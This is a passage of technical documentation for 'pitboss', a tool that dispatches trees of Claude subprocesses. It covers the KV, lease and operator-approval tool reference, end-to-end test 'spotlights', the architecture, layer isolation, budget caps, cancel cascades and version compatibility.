Returns: { "entries": [{ "path": "...", "version": 1, "updated_at": "..." }, ...] }

Returns metadata only (no values). Follow up with kv_get for values.


kv_wait

Block until a path reaches a minimum version. Useful for workers to wait until the lead writes a shared configuration, or for the lead to wait until a worker writes its result.

Args:

{
  "path": "/peer/self/completed",
  "timeout_secs": 60,
  "min_version": 1
}

Returns: Entry when the condition is met. Times out with an error if timeout_secs elapses.


lease_acquire

Acquire a named mutex within the current layer. Auto-released on actor termination.

Args:

{
  "name": "/leases/output-file",
  "ttl_secs": 30,
  "wait_secs": 10
}

Returns: { "lease_id": "uuid", "version": 1, "acquired_at": "...", "expires_at": "..." }

  • name is a path under /leases/*.
  • ttl_secs — how long the lease lives after acquisition.
  • wait_secs — block up to this many seconds for the lease to become available. If omitted, fail immediately if already held.
  • The error message on contention names the current holder, so the requesting actor knows who to wait on.

lease_release

Release a held lease.

Args: { "lease_id": "uuid" }

Returns: { "ok": true }


run_lease_acquire (v0.6+)

Acquire a run-global mutex. Scoped to the entire dispatch (not per-layer). Use for resources that span sub-trees.

Args: { "key": "string", "ttl_secs": 30 }

Returns: { "lease_id": "uuid", "version": 1 }

Auto-released on actor termination, same as per-layer leases.


run_lease_release (v0.6+)

Release a run-global lease.

Args: { "lease_id": "uuid" }

Returns: { "ok": true }


Coordination patterns

Lead writes a shared config; workers read it

# Lead:
kv_set(path="/ref/config", value="target: main branch")

# Workers (in prompt):
Read /ref/config via mcp__pitboss__kv_get. Then proceed with the task.

Worker signals completion; lead polls

# Worker:
kv_set(path="/peer/self/done", value="true")

# Lead:
kv_wait(path="/peer/<worker-id>/done", timeout_secs=120, min_version=1)

Workers coordinate via CAS counter

# Worker (pseudo):
while true:
  entry = kv_get("/shared/next-chunk")
  n = entry.version
  result = kv_cas("/shared/next-chunk", expected_version=n, new_value=str(n+1))
  if result.swapped:
    process_chunk(n)
    break
  # else: another worker got there first, retry

For a canonical reference, see AGENTS.md in the source tree.

Approval tools

These tools are available to the lead (and sub-leads). Workers cannot call approval tools.

For the operator-side view (TUI, [[approval_policy]] rules, [run].approval_policy), see Approvals.


request_approval

Gate a single in-flight action on operator approval. The lead blocks until the operator approves, rejects, or edits.

Args:

{
  "summary": "string (required)",
  "timeout_secs": 60,
  "plan": {
    "summary": "string (required)",
    "rationale": "string",
    "resources": ["list of files/APIs/PRs that will be touched"],
    "risks": ["known failure modes"],
    "rollback": "how to undo if something goes wrong"
  },
  "tool_name": "string (optional hint for policy matching)",
  "cost_estimate": 0.05
}

Returns:

{
  "approved": true,
  "comment": "optional operator comment",
  "edited_summary": "optional operator-edited version of summary"
}

Notes:

  • The plan field is optional for simple approvals but strongly recommended for non-trivial actions (deletions, multi-file edits, irreversible operations).
  • tool_name and cost_estimate are hints that allow [[approval_policy]] rules to match on tool_name / cost_over criteria.
  • Policy rules (if configured) are evaluated before the request reaches the operator queue. A matching auto_approve or auto_reject rule skips the operator entirely.

propose_plan

Gate the entire run on operator pre-flight approval. Submit an execution plan before spawning any workers.

Args:

{
  "plan": {
    "summary": "string (required)",
    "rationale": "string",
    "resources": ["files, services, PRs that will be touched"],
    "risks": ["known failure modes"],
    "rollback": "how to undo"
  },
  "timeout_secs": 120
}

Returns: Same shape as request_approval.

Notes:

  • When [run].require_plan_approval = true, spawn_worker refuses until a propose_plan call has received approved: true.
  • The TUI modal shows [PRE-FLIGHT PLAN] in the title (vs [IN-FLIGHT ACTION] for request_approval) so operators can tell them apart.
  • On rejection, the gate stays closed — the lead can revise and call propose_plan again.
  • When require_plan_approval = false (the default), calling propose_plan is informational only — spawn_worker never checks the result.

ApprovalPlan schema

{
  "summary": "required; appears in the modal title",
  "rationale": "optional; why this action should be taken",
  "resources": ["optional; files, APIs, PRs that will be touched"],
  "risks": ["optional; known failure modes — TUI highlights these in warning color"],
  "rollback": "optional; how to undo if something goes wrong"
}

Use the structured plan form for any non-trivial approval. The bare summary string form (no plan field) still works for simple approvals.


Approval TTL and fallback (v0.6+)

Prevent an unreachable operator from permanently stalling the tree:

  • timeout_secs in the call sets a per-approval TTL.
  • A background watcher applies the run-level approval_policy as the fallback when the TTL expires.

If approval_policy = "auto_reject" and a lead calls request_approval with timeout_secs = 30, the approval auto-rejects after 30 seconds if no operator responds.


Reject-with-reason

When an operator rejects with a reason comment, the reason flows back in comment. The lead can use it to adapt immediately — for example, switching output format — without a separate reprompt_worker call.

Example prompt pattern:

result = request_approval(summary="Write results as JSON?", ...)
if not result.approved:
    # result.comment might say "use CSV, not JSON"
    write_as_csv(findings)

Cookbook — Spotlights overview

The dogfood spotlights are repeatable end-to-end tests that prove pitboss v0.6 features work from the operator’s perspective. They drive the real pitboss dispatch CLI or in-process integration tests — not just unit tests of the library.

All spotlight source files live under examples/dogfood/ in the repository.

Running spotlights

Shell script (subprocess demo):

bash examples/dogfood/fake/01-smoke-hello-sublead/run.sh

All dogfood tests via Cargo:

cargo test --test dogfood_fake_flows

Full suite:

cargo test --workspace --quiet

Fake vs. real spotlights

fake/ spotlights use the fake-claude binary with pre-baked JSONL scripts. Fully deterministic, fast (~1s), no Anthropic API calls.

real/ spotlights (R1–R3) use the actual claude binary. They require PITBOSS_DOGFOOD_REAL=1 and a valid Anthropic API key. They count against your quota.

Spotlight index

Fake spotlights

#NameWhat it provesCargo test
01smoke-hello-subleadDepth-2 manifest dispatches; allow_subleads, max_subleads, [lead.sublead_defaults] all parse and resolve. summary.json shows tasks_failed=0.cargo test --test dogfood_fake_flows
02Strict-tree isolationPer-layer KV isolation; root cannot read sub-tree state without read_down; strict peer visibility.dogfood_isolation_strict_tree
03Kill-cascade drainRoot cancel cascades depth-first through all sub-leads and workers within 200ms.dogfood_kill_cascade_drain
04Run-global lease contentionTwo sub-leads competing for the same run_lease_acquire key serialize correctly.dogfood_run_lease_contention
05Approval policy auto-filter[[approval_policy]] rules auto-approve matching requests before they reach the operator queue.dogfood_policy_auto_filter
06Envelope cap enforcementmax_sublead_budget_usd cap rejects oversized spawn attempts pre-state; clean retry succeeds.dogfood_envelope_cap_rejection

Real spotlights (API-gated)

#NameNotes
R1real-root-spawns-subleadReal haiku lead calls spawn_sublead at least once. ~$0.05.
R2real-kill-with-reasonKill-with-reason stub (full orchestration deferred).
R3real-reject-with-reasonLead adapts output format after auto_reject approval response.

Real spotlights are in examples/dogfood/real/. Run with:

PITBOSS_DOGFOOD_REAL=1 cargo test --test dogfood_real_flows -- --ignored

Spotlight #02: Strict-tree isolation

Source: examples/dogfood/fake/02-isolation-strict-tree/

What it demonstrates

This spotlight exercises per-layer KV store isolation and strict peer visibility in a depth-2 dispatch.

A root lead decomposes a multi-phase job into two parallel sub-trees:

  • S1 — “phase 1: gather inputs”
  • S2 — “phase 2: process outputs”

Each sub-lead writes its progress to /shared/progress. The spotlight proves:

  1. KV isolation: S1’s /shared/progress and S2’s /shared/progress live in separate layer stores. Each sub-lead reads back its own write; neither can observe the other’s.

  2. Root isolation: Root’s /shared/progress is in a third, independent store. After S1 and S2 write their progress, root’s layer still has no entry at that path.

  3. Strict peer visibility: Workers within the same layer cannot read each other’s /peer/<id>/* slots. The MCP server rejects such reads with a “strict peer visibility” error.

  4. Layer-lead privilege: The root lead (as layer lead of the root layer) CAN read any worker’s /peer/<id>/* slot in the root layer.

How to run

This spotlight is verified via an in-process integration test (no real subprocess or API dependency):

cargo test --test dogfood_fake_flows dogfood_isolation_strict_tree

The test constructs a DispatchState and McpServer in-process and drives them via FakeMcpClient over a Unix socket.

The run.sh script prints instructions pointing to this cargo invocation.

Key assertions

See expected-observables.md for the full plain-English description of expected behavior.

Why this matters

Without strict-tree isolation, a noisy sub-tree could observe another sub-tree’s partial state and corrupt its coordination logic. The KV isolation guarantee means each sub-tree can be reasoned about independently — operators can audit one phase without worrying about contamination from another.

Spotlight #03: Kill-cascade drain

Source: examples/dogfood/fake/03-kill-cascade-drain/

What it demonstrates

This spotlight exercises depth-first cascade cancellation with a grace window in a depth-2 dispatch.

Scenario: An operator kicks off a long-running dispatch — a root lead that has spawned two sub-leads (S1 for “phase 1” and S2 for “phase 2”), each with two active workers. Partway through, the operator realizes something is wrong (wrong prompt, runaway cost, unexpected output) and presses cancel.

Within the drain grace window, the root cancel cascades depth-first through the entire sub-tree:

  • Root cancel token is triggered
  • Each sub-lead’s cancel token is triggered
  • Each sub-lead’s worker cancel tokens are triggered

No straggler processes are left running and burning budget.

How to run

cargo test --test dogfood_fake_flows dogfood_kill_cascade_drain

The test constructs a DispatchState and McpServer in-process, spawns two sub-leads via the MCP spawn_sublead tool, injects two simulated worker cancel tokens into each sub-tree, triggers root cancel, and asserts that every token in the tree reaches the draining state within 200ms.

The run.sh script prints instructions pointing to this cargo invocation.

Why cascade matters

Without explicit cascade, cancelling root would stop the root lead process but sub-lead sessions and their workers would keep running — consuming API budget and writing to the shared store — until they timed out or were killed by an external signal.

The cascade watcher installed by install_cascade_cancel_watcher ensures the drain signal propagates to every node in the tree synchronously within the tokio event loop. The full dispatch shuts down cleanly inside the grace window.

Key assertions

See expected-observables.md for the full scenario with timing expectations.

Spotlight #04: Run-global lease contention

Source: examples/dogfood/fake/04-run-lease-contention/

What it demonstrates

This spotlight exercises run-global lease coordination across sub-trees in a depth-2 dispatch.

Scenario: An operator has a shared filesystem resource (e.g., output.json) that multiple sub-leads need exclusive write access to. The run-global lease API (run_lease_acquire / run_lease_release) provides cross-tree coordination.

Two sub-leads (S1 and S2) compete for the same lease key:

  1. S1 acquires the lease first and holds it successfully
  2. S2 attempts to acquire the same lease — blocked, with S1 named as current holder
  3. S1 releases the lease
  4. S2 retries and acquires successfully

How to run

cargo test --test dogfood_fake_flows dogfood_run_lease_contention

The test constructs a DispatchState and McpServer in-process, spawns two sub-leads, drives them through the acquire/release dance, and asserts that blocking, release, and reacquisition work correctly.

The run.sh script prints instructions pointing to this cargo invocation.

The key distinction this spotlight demonstrates

Lease typeScopeUse for
/leases/* via lease_acquirePer-layer (sub-tree internal)Resources only one sub-tree writes to
run_lease_acquireRun-global (spans all sub-trees)Operator filesystem paths, shared services

If S1 and S2 used per-layer /leases/* instead of run_lease_acquire, they would each get their own independent /leases/output-file with no contention — which is wrong when they’re both trying to write the same real file.

Key assertions

See expected-observables.md for the full scenario with expected lease state transitions.

Spotlight #05: Approval policy auto-filter

Source: examples/dogfood/fake/05-policy-auto-filter/

What it demonstrates

This spotlight exercises [[approval_policy]] declarative auto-filtering in a depth-2 dispatch.

Scenario: An operator configures a deterministic policy to auto-approve routine tool-use from a trusted sub-lead (S1) while blocking plan-category approvals — reducing approval noise at scale.

The spotlight proves four things:

  1. Rule-based auto-approval: When S1 requests tool-use approval, Rule 1 (actor = root→S1, category = ToolUse) immediately approves without operator involvement.

  2. Actor-specific filtering: S2 makes an identical tool-use request, but since Rule 1 only matches root→S1, S2’s request falls through to the operator queue.

  3. Category-based blocking: When S1 submits a plan approval, Rule 2 (category = Plan, action = block) forces operator review regardless of actor.

  4. Reduced operator noise: Only non-matching requests land in the operator’s queue. S1’s routine tool-use never alerts the operator.

The policy configuration

[[approval_policy]]
match = { actor = "root→S1", category = "tool_use" }
action = "auto_approve"

[[approval_policy]]
match = { category = "plan" }
action = "block"

First-match-wins. A request from S1 with category = ToolUse matches Rule 1 → auto-approved. A request from S1 with category = Plan does not match Rule 1 (wrong category) → falls to Rule 2 → blocked for operator.

How to run

cargo test --test dogfood_fake_flows dogfood_policy_auto_filter

The test:

  • S1’s auto-approved request does not appear in the operator queue
  • S2’s request and S1’s plan approval do appear in the queue
  • Queue entries exist only for non-matching rules

The run.sh script prints instructions pointing to this cargo invocation.

Why deterministic rules (not LLM-evaluated)

Approval policies are Rust-evaluated — always deterministic, zero latency, auditable. This makes them suitable for high-volume auto-approvals (e.g., “trust S1’s read-only operations”) while LLM-based approval (via propose_plan or request_approval with a rich plan) handles judgment calls that genuinely need human review.

Key assertions

See expected-observables.md for the full expected behavior.

  • Approvals[[approval_policy]] reference
  • MCP approvalsrequest_approval / propose_plan tool reference

Spotlight #06: Envelope cap enforcement

Source: examples/dogfood/fake/06-envelope-cap-rejection/

What it demonstrates

This spotlight exercises manifest-level budget cap enforcement with clean rejection semantics in a depth-2 dispatch.

Scenario: An operator sets max_sublead_budget_usd = 3.0 as a safety rail. A root lead attempts to spawn a sub-lead with budget_usd = 5.0 (either by bad design or runaway generation). The cap enforcement rejects the spawn cleanly — no partial state, no phantom reservation.

The spotlight proves four things:

  1. Cap rejection is pre-state: When the envelope budget exceeds max_sublead_budget_usd, spawn_sublead returns an error before any state mutation. No half-spawned sub-lead is registered.

  2. Error message is actionable: The error names the cap (“exceeds per-sublead cap”), allowing Claude to understand the constraint and retry with a smaller budget.

  3. Clean state after rejection: After a rejected spawn:

    • state.subleads is empty (no partial registration)
    • reserved_usd == 0 (no phantom reservation)
  4. Successful retry with compliant budget: Retrying with budget_usd = 2.0 (within the 3.0 cap) succeeds; the sub-lead is registered and reserved_usd = 2.0.

The manifest cap

[[lead]]
allow_subleads = true
max_sublead_budget_usd = 3.0

How to run

cargo test --test dogfood_fake_flows dogfood_envelope_cap_rejection

The test:

  1. Constructs a DispatchState with max_sublead_budget_usd = 3.0
  2. Attempts spawn_sublead(budget_usd=5.0) → expects MCP error
  3. Verifies no partial state and no budget reserved
  4. Retries with spawn_sublead(budget_usd=2.0) → expects success

The run.sh script prints instructions pointing to this cargo invocation.

Why pre-state rejection matters

Failing before any state mutation keeps the dispatch state clean and predictable. A half-spawned sub-lead with a phantom budget reservation would be difficult to diagnose and could cause downstream spawn failures or incorrect budget accounting.

Key assertions

See expected-observables.md for the full expected behavior.

Architecture overview

One-screen mental model

Pitboss is a dispatcher that manages a tree of claude subprocesses under operator-defined guardrails. In the simplest case (flat mode), it’s a process pool. In the full case (depth-2 hierarchical), it’s a two-tier tree with a control plane and shared coordination state.

Operator
  │
  ├─ pitboss dispatch <manifest>
  │     │
  │     ├─ [root lead] ──────── MCP bridge (stdio↔unix socket)
  │     │     │                              │
  │     │     │              MCP server ─────┘
  │     │     │                  │
  │     │     │                  ├─ DispatchState (root layer)
  │     │     │                  │    KvStore, LeaseRegistry, ApprovalQueue
  │     │     │                  │
  │     │     ├─ spawn_sublead ──┤
  │     │     │     │            ├─ LayerState (sub-lead S1)
  │     │     │     │            │    KvStore, workers, budget
  │     │     │     │            │
  │     │     │     └─ [S1 lead] ──── spawn_worker → [W1, W2, W3]
  │     │     │
  │     │     └─ spawn_sublead ──┤
  │     │                        ├─ LayerState (sub-lead S2)
  │     │                        │
  │     │                        └─ [S2 lead] ──── spawn_worker → [W4, W5]
  │     │
  │     └─ control.sock ─────── pitboss-tui (operator floor view)
  │
  └─ run artifacts: ~/.local/share/pitboss/runs/<run-id>/

Key components

Dispatcher (pitboss)

The CLI binary. Reads the manifest, validates it, sets up the run directory, and kicks off the dispatch. In flat mode, it starts a process pool directly. In hierarchical mode, it starts the MCP server and spawns the lead subprocess with a generated --mcp-config.

MCP server

Listens on a unix socket per run. Receives tool calls from leads (and workers) via the bridge proxy. All tool handlers route through DispatchState for authorization and state mutation.

The bridge

pitboss mcp-bridge <socket> — a stdio-to-socket proxy auto-launched for each claude subprocess that needs MCP access. Claude Code speaks stdio JSON-RPC; the pitboss MCP server speaks unix socket. The bridge translates between them and stamps _meta (actor identity) into each forwarded call.

DispatchState

The root state object. In v0.6+, it wraps an Arc<LayerState> for the root layer plus a registry of sub-lead LayerState objects. All MCP tool handlers receive a DispatchState reference and use it to locate the right layer for authorization and coordination.

LayerState

Per-layer state: the layer’s KvStore, worker registry, budget tracking, ApprovalQueue, and cancel tokens. Workers within a layer share one LayerState. Sub-leads each get their own LayerState — this is what provides isolation.

Control socket

A unix socket (control.sock) in the run directory that the TUI connects to. The TUI sends control operations (cancel, pause, reprompt, approve) and receives push events (worker state changes, approval requests, budget updates). The dispatcher applies operations to DispatchState and broadcasts events back.

TUI (pitboss-tui)

A ratatui terminal application that connects to the control socket of a running dispatch. Reads-only for finished runs (no control socket). See TUI for the operator interface.

Data flow: a worker spawn

  1. Lead calls mcp__pitboss__spawn_worker via its MCP bridge subprocess.
  2. Bridge reads the stdio request and forwards it to the MCP server on the unix socket, adding _meta.actor_id from its --actor-id arg.
  3. MCP server handler receives the call, looks up the caller’s layer in DispatchState, and validates the request (budget, worker cap, plan gate).
  4. Dispatcher spawns a claude subprocess with generated --mcp-config (for workers: shared-store tools only) and a new worktree.
  5. Worker’s task id and worktree path are returned to the lead via MCP response.
  6. TUI receives a WorkerSpawned push event from the control socket and renders a new tile.

Philosophy

The model is stochastic. The pit is not.

Pitboss bets on four guarantees:

  1. Isolation. Each worker runs in its own git worktree. One bad hand doesn’t contaminate the next.
  2. Observability. Every token, every cache hit, every session id is persisted. The artifacts are on the table.
  3. Bounded risk. Workers, budget, and timeouts are explicit. The house knows its exposure before the first card is dealt.
  4. Determinism where it’s free. Stream-JSON parsing, cancellation protocol, KV authorization, approval policy matching — all Rust, all deterministic, none LLM-evaluated.

For deeper dives, see The two-layer model and Lease scope selection.

The two-layer model

Pitboss v0.6 introduced a second coordination tier. Understanding the layer structure is essential for writing correct depth-2 manifests.

Layers

A layer is the scope within which workers and leads share coordination state (KV store, leases, approval queue). In the v0.6 model:

  • Root layer — always present. Contains the root lead, any direct workers the root lead spawns, and the run-global lease registry.
  • Sub-lead layers — one per spawned sub-lead. Each sub-lead layer contains that sub-lead’s lead session and the workers it spawns.

Workers remain terminal: they cannot spawn anything. A sub-lead is a lead within its own layer; it can spawn workers but not other sub-leads.

Root layer
  ├─ root lead (reads/writes root KvStore)
  ├─ worker W0 (if root lead calls spawn_worker directly)
  └─ run-global LeaseRegistry (spans all layers)

Sub-lead S1 layer
  ├─ sub-lead S1 (reads/writes S1 KvStore)
  ├─ worker W1
  └─ worker W2

Sub-lead S2 layer
  ├─ sub-lead S2 (reads/writes S2 KvStore)
  ├─ worker W3
  └─ worker W4

Isolation by default

Sub-tree layers are opaque to root unless read_down = true is passed at spawn_sublead time. This means:

  • The root lead cannot kv_get any path from S1’s or S2’s layer.
  • S1 cannot kv_get any path from S2’s layer or the root layer.
  • Workers within S1 cannot see each other’s /peer/<X>/* slots; only S1’s lead and the operator can.

This isolation is not just a convention — it’s enforced at the MCP tool handler layer.

The read_down escape hatch

When the root lead calls spawn_sublead(..., read_down=true), the root gains read access into that sub-tree’s KV namespace. Write access is never granted to the root for sub-tree namespaces (the sub-lead’s workers must remain the writers).

Use read_down when:

  • The root lead’s synthesis step needs to observe sub-tree progress without going through explicit handoff patterns (like /peer/S1/done).
  • You’re building a monitoring-style root that reports on all sub-tree states.

Avoid read_down when you want strict phase isolation — if Phase 1 shouldn’t influence Phase 2’s context, don’t give root visibility that it might inadvertently surface in Phase 2’s prompt.

The operator is always super-user

The TUI can read and write across all layers regardless of read_down. This is intentional: the operator needs unrestricted visibility for debugging and approval decisions.

Sub-leads as peers in the root layer

Sub-leads are not workers in the root layer. They appear as sub-tree containers in the TUI, not as worker tiles. The root lead tracks sub-leads via sublead_id (returned by spawn_sublead) and waits on them via wait_actor.

From the root lead’s perspective:

  • spawn_worker → creates a worker tile in the root layer
  • spawn_sublead → creates a sub-tree with its own layer

Both return identifiers the root lead can use with wait_actor.

Budget flow

Budget flows hierarchically:

  1. Operator sets budget_usd = 20.00 on the run.
  2. Root lead calls spawn_sublead(budget_usd=5.0) → $5 is reserved from the root budget.
  3. Sub-lead S1 spawns workers; each worker spawn reserves an estimate from S1’s $5 envelope.
  4. When S1 terminates, any unspent envelope returns to the root’s reservable pool.

The max_sublead_budget_usd manifest cap enforces an upper bound on any single sub-lead envelope, regardless of what the root lead requests.

Cancel cascade

Cancellation propagates depth-first. A root cancel:

  1. Trips the root layer’s drain token.
  2. The cascade watcher finds all registered sub-leads and trips their cancel tokens.
  3. Each sub-lead’s cancel triggers its worker cancel tokens.

The two-phase drain at each layer ensures no straggler processes. Sub-leads spawned mid-drain are caught by a spawn-time is_draining() check.

Kill-with-reason routing

cancel_worker(task_id, reason) routes one hop upward:

  • Cancel a worker → the worker’s layer lead (sub-lead or root) receives the synthetic [SYSTEM] reprompt.
  • Cancel a sub-lead → the root lead receives the reprompt.

The root lead is never notified for cancels that stay within a sub-tree it doesn’t own (unless it has read_down = true and is observing).

Lease scope selection

Pitboss provides two lease primitives. Choosing the right one prevents silent cross-tree collisions.

Quick rule

ResourcePrimitive to use
Internal to one sub-tree/leases/* via lease_acquire
Shared across sub-treesrun_lease_acquire
When in doubtrun_lease_acquire

Over-serializing is always safer than silent collision.

The two primitives

Per-layer leases: lease_acquire / lease_release

Each layer (root, S1, S2, …) has its own KvStore with its own /leases/* namespace. A lease acquired by an actor in S1 at path /leases/output-file is entirely separate from a lease acquired by an actor in S2 at the same path.

This isolation is by design. It means sub-trees can coordinate internally without knowing about each other. It also means per-layer leases provide no cross-tree serialization.

Use per-layer leases for:

  • A chunk-processing counter within one phase’s workers
  • A mutex for a temporary file that only one sub-tree touches
  • Any resource fully scoped to a single sub-tree’s lifetime

Run-global leases: run_lease_acquire / run_lease_release

Run-global leases live on DispatchState (outside any layer) in a dedicated LeaseRegistry. A lease acquired at key "output.json" by S1 blocks S2 from acquiring the same key.

Use run-global leases for:

  • A path on the operator’s filesystem that multiple sub-trees write to
  • A shared service or network port that only one phase should use at a time
  • Any resource that must be serialized across the entire dispatch tree

Why the split exists

Sub-tree isolation is a core guarantee. If per-layer leases were globally shared, one sub-tree’s lock could block an unrelated sub-tree — violating isolation and making sub-tree behavior dependent on sibling activity.

The run-global lease registry exists as a deliberate, explicit cross-tree escape hatch. Because it’s separate and explicitly invoked, operators and leads can reason about which resources are cross-tree-serialized without inspecting sibling sub-trees.

Auto-release on termination

Both primitive types auto-release their leases when the holding actor’s MCP session terminates (connection drop, worker crash, Ctrl-C). This prevents deadlocks from crashed workers holding leases indefinitely.

The TTL (ttl_secs) is a belt-and-suspenders backup: if the auto-release misses (e.g., an ungraceful socket close), the lease expires after the TTL.

Debugging lease contention

When run_lease_acquire or lease_acquire returns a contention error, the error message names the current holder:

lease "output.json" held by actor <uuid> (S1→W2), expires in 28s

This lets the waiting actor know whether to retry immediately (holder is about to expire) or wait for an explicit release.

Spotlight

Spotlight #04 (Run-global lease contention) demonstrates the full acquire/block/release/retry sequence in a runnable test.

Changelog

{{#include ../../CHANGELOG.md}}

Compatibility

Pitboss makes specific backward-compatibility guarantees at each version boundary. This page summarizes the current compatibility posture for operators upgrading to or running v0.6.

v0.6.0 — depth-2 sub-leads

Backward compatible with v0.5

v0.6 is fully backward-compatible with v0.5 manifests and tooling:

  • Manifests: v0.5 manifests (flat mode, hierarchical without allow_subleads) run unchanged. allow_subleads defaults to false; no new fields are required.
  • MCP callers: v0.5 leads that only call spawn_worker, wait_for_worker, list_workers, etc. work identically. New tools (spawn_sublead, wait_actor, run_lease_acquire, run_lease_release) are additive and not required.
  • Control-plane clients: TUI sessions connected to a v0.6 dispatcher behave identically when no sub-leads are spawned. New TUI elements (grouped grid, approval list pane) appear only when depth-2 features are used.
  • Wire format: EventEnvelope adds actor_path (e.g., "root→S1→W3") with serde(skip_serializing_if = "ActorPath::is_empty"), so v0.5 consumers parsing event streams see no change for flat or depth-1 runs.
  • On-disk run artifacts: summary.json schema is backward-compatible. New fields added with #[serde(default)]; pre-v0.6 records parse cleanly.
  • SQLite: All schema migrations are idempotent. Opening a v0.5 database under v0.6 auto-migrates.

Nothing removed in v0.6

No tools, manifest fields, CLI subcommands, or TUI behaviors were removed in v0.6. wait_for_worker is retained as a back-compat alias for wait_actor.

v0.5.0

Backward compatible with v0.4

  • v0.4.x manifests run unchanged. require_plan_approval defaults to false.
  • pause_worker gains a mode field; the default ("cancel") matches v0.4 behavior.
  • approval_policy defaults to "block", matching v0.4.
  • v0.4.x run directories deserialize with new counter fields defaulting to 0.

v0.4.0

Backward compatible with v0.3

  • v0.3.x manifests run unchanged. approval_policy defaults to "block".
  • v0.3.x on-disk runs: control.sock absent → TUI enters observe-only mode.
  • parent_task_id on TaskRecord uses #[serde(default)]; v0.3 records parse as null.

Forward-looking guarantees

Pitboss follows Semantic Versioning:

  • Patch versions (0.6.x) — bug fixes only; no schema or API changes.
  • Minor versions (0.7+) — additive features; existing manifests and callers continue to work.
  • Major version (1.0) — reserved for breaking changes. None currently planned.

The authoritative guide to what changed in each version is CHANGELOG.md in this book (sourced directly from the repository’s CHANGELOG.md).

Checking compatibility

pitboss validate pitboss.toml

pitboss validate is the runtime source of truth. If a manifest field doesn’t parse, validate will report it. The binary always wins over documentation — file a PR if something here is wrong.